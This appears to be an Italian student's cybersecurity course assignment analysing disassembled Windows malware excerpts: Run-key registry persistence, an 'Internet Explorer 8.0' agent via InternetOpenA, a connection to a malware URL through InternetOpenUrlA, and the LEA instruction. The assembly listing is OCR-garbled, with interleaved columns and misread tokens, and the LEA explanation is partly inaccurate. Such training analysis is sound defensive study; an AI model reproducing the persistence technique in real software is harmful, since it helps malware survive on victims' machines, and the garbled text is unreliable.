CONSEGNA SETTIMANA 11 LEZIONE 1

Windows malware

Con riferimento agli estratti di un malware di seguito rappresentato, ci viene richiesto di rispondere alle seguenti domande.

- PUNTO 1. Descrivere come il malware ottiene la persistenza, evidenziando il codice assembly dove le relative istruzioni e chiamate di funzioni vengono eseguite
- PUNTO 2. Identificare il client software utilizzato dal malware per la connessione ad Internet
- PUNTO 3. Identificare l'URL al quale il malware tenta di connettersi ed evidenziare la chiamata di funzione che permette al malware di connettersi ad un URL
- BONUS: qual è il significato e il funzionamento del comando assembly "lea"

.text:00401180

text:00401180

.text:00401180 StartAddress

```
; samDesired
                    2
0040286F
           push
00402871
           push
                    eax
                                        ulOptions
00402872
                    offset SubKey
                                        "Software\\Microsoft\\Windows\\CurrentVersion\\Run"
           push
                    HKEY LOCAL MACHINE; hKey
           push
00402877
                                                                                        Il malware sfrutta l'accesso e
                    esi; RegOpenKeyExW
           call
0040287C
                                                                                        la modifica di una chiave di
0040287E
           test
                    eax, eax
                                                                                        registro presente nel registro
                                                                                        di sistema per ottenere la
00402880
           inz
                    short loc 4028C5
                                                                                        persistenza all'interno del
00402882
                                                                                        sistema operativo anche
00402882 loc 402882:
                                                                                        dopo un eventuale
00402882
                    ecx, [esp+424h+Data]
           lea
                                                                                        arresto/riavvio.
00402886
           push
                                      ; lpString
                    ecx
00402887
           mov
                    bl, 1
                                                                                        Il comando LEA (load
00402889
           call
                    ds:lstrlenW
                                                                                        effective address ) ottiene un
0040288F
           lea
                    edx, [eax+eax+2]
                                                                                        risultato similare al
00402893
           push
                    edx
                                       cbData
                                                                                        comando mov ma con un
                    edx,
                         [esp+428h+hKey]
00402894
           mov
                                                                                        approccio diverso, in grado
00402898
                    eax, [esp+428h+Data]
           lea
                                                                                        di bypassare la ALU. In
0040289C
           push
                    eax
                                      ; lpData
                                                                                        pratica il comando LEA
0040289D
           push
                    1
                                      ; dwType
                                                                                        carica in un registro
                                      ; Reserved
0040289F
                                                                                        l'indirizzo effettivo di una
           push
004028A1
                    ecx, [esp+434h+ValueName]
                                                                                        certa variabile. Lo scopo
           lea
                                                                                        principale è quello di poter
                                      ; lpValueName
004028A8
           push
                    ecx
                                                                                        eseguire più operazioni in
004028A9
           push
                                      ; hKey
                                                                                        linea, così da risultare in un
004028AA
           call
                    ds:RegSetValueExW
                                                                                        codice più compresso.
.text:00401150
.text:00401150
.text:00401150 ; DWORD
                           stdcall StartAddress(LPVOID)
                                                              ; DATA XREF: sub 401040+ECTo
.text:00401150 StartAddress
                                  proc near
.text:00401150
                                   push
                                           esi
.text:00401151
                                   push
                                           edi
.text:00401152
                                            0
                                                               dwFlags
                                  push
.text:00401154
                                           8
                                                                1pszProxyBypass
                                   push
.text:00401156
                                           ß
                                   push
                                                               1pszProxy
.text:00401158
                                                                dwAccessType
                                                                                                  Viene utilizzato Internet
                                   push
.text:0040115A
                                   push
                                           offset szAgent
                                                                "Internet Explorer 8.0"
                                                                                                  Explorer (versione 8.0) come
.text:0040115F
                                   call
                                           ds:InternetOpenA
                                                                                                  client per la connessione ad
                                           edi, ds:InternetOpenUrlA
.text:00401165
                                   mov
                                                                                                  internet.
.text:0040116B
                                           esi, eax
                                   mov
.text:0040116D
.text:0040116D loc 40116D:
                                                              ; CODE XREF: StartAddress+301j
text:0040116D
                                           0
                                                                dwContext
                                   nush
                                                                                                  In questa sezione del
                                           80000000h
.text:0040116F
                                   push
                                                                dwFlags
                                                                                                  malware viene indicato
.text:00401174
                                   push
                                                                dwHeadersLength
                                                                                                  http://www.malware12.com
.text:00401176
                                  push
                                                                1pszHeaders
                                           0
                                                                                                  come URL malevolo da
.text:00401178
                                  push
                                           offset szUrl
                                                                "http://www.malware12coM
                                                                                                  aprire, inoltre tramite la
                                                              ; hInternet
.text:0040117D
                                  push
                                           esi
                                                                                                  chiamata alla funzione per
.text:0040117E
                                  call
                                           edi
                                                  InternetOpenUrlA
                                                                                                  aprire l'URL risulta all'indice
```

short loc_40116D

0040117E.

jmp

endp